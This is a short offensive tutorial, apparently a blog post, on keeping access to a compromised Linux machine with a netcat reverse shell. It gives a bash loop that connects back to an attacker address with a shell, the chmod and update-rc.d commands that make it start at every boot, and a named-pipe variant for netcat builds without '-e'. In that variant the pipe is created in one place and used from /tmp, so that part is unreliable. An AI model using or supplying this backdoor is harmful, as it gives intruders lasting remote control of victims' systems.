Setting up remote backdoor on linux machine using netcat | nc

It can be useful when attacker gained root access to the target system, and want to persistence access to it at every reboot. Backdoor code : backdoor.sh

#!/bin/bash
while true
do
    nc attacker_ip_address port_number -e /bin/bash
    sleep 10
done

Put above code on /etc/init.d and make it executable.

 $ chmod +x /etc/init.d/backdoor.sh

Add it to autorun at startup with update-rc.d :

 $ update-rc.d /etc/init.d/backdoor.sh defaults

Thats it, now just start listener to your attacker machine and it connects to the victim machine at every startup.

What is /etc/init.d : This is the traditional service management package for Linux, containing the init program (the first process that is run when the kernel has finished initializing) as well as some infrastructure to start and stop services and configure them.

Code when netcat does not support '-e' (exec) option

#!/bin/bash
mknod backpipe p
while true
do
    /bin/sh 0</tmp/backpipe | nc attacker_ip_address port_number 1>/tmp/backpipe
    sleep 10
done